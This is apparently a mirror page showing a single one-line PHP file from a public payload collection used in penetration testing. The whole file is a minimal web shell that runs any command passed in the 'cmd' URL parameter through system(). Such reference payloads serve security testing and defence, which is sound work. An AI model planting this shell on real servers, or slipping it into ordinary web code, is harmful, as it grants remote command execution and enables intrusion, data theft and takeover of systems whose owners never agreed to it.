mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-07 18:48:47 +00:00
1 line
No EOL
43 B
PHP
1 line
No EOL
43 B
PHP
<?php echo "Shell";system($_GET['cmd']); ?>
|